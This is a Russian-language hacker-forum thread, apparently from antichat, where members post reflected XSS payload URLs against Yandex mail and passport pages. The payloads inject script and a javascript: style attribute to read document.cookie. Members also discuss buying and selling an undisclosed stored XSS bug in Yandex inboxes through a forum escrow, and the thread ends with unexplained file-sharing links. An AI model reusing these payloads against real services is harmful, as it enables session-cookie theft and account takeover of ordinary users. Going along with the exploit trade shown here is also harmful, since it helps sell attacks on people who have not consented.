Вот, наткнулся... Т.к. пассивная, выкладываю сюда.
Совершенно ничего не фильтруется, вообщем good :)

-http://mail.yandex.ru/colabook_formaddp?name="><script>alert(document.cookie)</script>
+ один товарищ тут (https://forum.antichat.ru/thread26526.html) продает нечто подобное.

З.Ы. Почему бы не закрепить yandex и rambler в этом разделе, т.к. это уже сделано с mail.ru?

Это уже на ваше усмотрение - хотите, переносите...
Выложил сюда, только из-за того, что это продается.
;)

Надо было в паблик выложить, испортить тому барыге бизнес:)

=) хехе

Как я помню он ее за 25уе продовал)))

один товарищ тут (https://forum.antichat.ru/thread26526.html) продает нечто подобное.


Продаваемая мною бага НЕ ИЗВЕСТНА НИКОМУ!
С выше написанной уязвимостью не имеет никакой связи.
Работает в другом направлении.

+ к этому скрипт, приготовленный для жертвы, будет выполняться каждый раз при заходе на страницу входящих сообщений. :)

С учётом того, что наконец пройдена проверка Гарантом, ПОКУПАЕМ!

Как работает выше написанная бага?
В двух проверенных браузерах, "><script>alert(document.cookie)</script> аккуратно распечатывается в форме :(

Наверно уже прикрыли, не пашет ни на ie, ни в myie.

IE: http://passport.yandex.ru/passport?mode=register&ncrnd=&step=one&confirmed=yes&idkey=&filled=yes&login=qwerty%22%20style='background:url(javascript :alert(document.cookie))'
правда глюки есть некоторые%)

Ребята, короче вот http://ifolder.ru/735692 и вот http://ifolder.ru/735710 потом скажите мне пожалуста что вы об этом думаете !??